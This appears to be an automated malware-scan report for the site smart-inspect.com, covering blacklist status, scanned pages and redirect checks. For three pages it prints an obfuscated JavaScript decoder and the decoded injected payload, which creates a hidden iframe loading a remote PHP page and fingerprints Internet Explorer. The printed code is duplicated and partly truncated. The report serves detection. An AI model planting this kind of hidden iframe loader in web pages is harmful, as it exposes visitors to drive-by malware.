Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=smart-inspect.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.smart-inspect.com/ | 200 OK Content-Length: 6167 Content-Type: text/html | clean |
http://www.smart-inspect.com/index.html | 200 OK Content-Length: 6167 Content-Type: text/html | clean |
http://www.smart-inspect.com/process.html | 200 OK Content-Length: 11681 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; } function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6= Decoded script: var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe'; var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe'; var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo); var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo); Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0); Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0); O Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase(); Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase(); var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8'); var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8'); document.body.appendChild(Obby); document.body.appendChild(Obby); Antivirus reports:
| ||
http://www.smart-inspect.com/links.html | 200 OK Content-Length: 10054 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; } function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6= Decoded script: var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe'; var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe'; var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo); var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo); Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0); Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0); O Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase(); Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase(); var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8'); var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8'); document.body.appendChild(Obby); document.body.appendChild(Obby); Antivirus reports:
| ||
http://www.smart-inspect.com/contact.html | 200 OK Content-Length: 9700 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; } function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6= Decoded script: var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe'; var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe'; var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo); var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo); Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0); Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0); O Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase(); Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase(); var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8'); var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8'); document.body.appendChild(Obby); document.body.appendChild(Obby); Antivirus reports:
| ||
http://www.smart-inspect.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://www.smart-inspect.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: smart-inspect.com
Result:
GET / HTTP/1.1
Host: smart-inspect.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: smart-inspect.com
Referer: http://www.google.com/search?q=smart-inspect.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: smart-inspect.com
Referer: http://www.google.com/search?q=smart-inspect.com
Result:
The result is similar to the first query. There are no suspicious redirects found.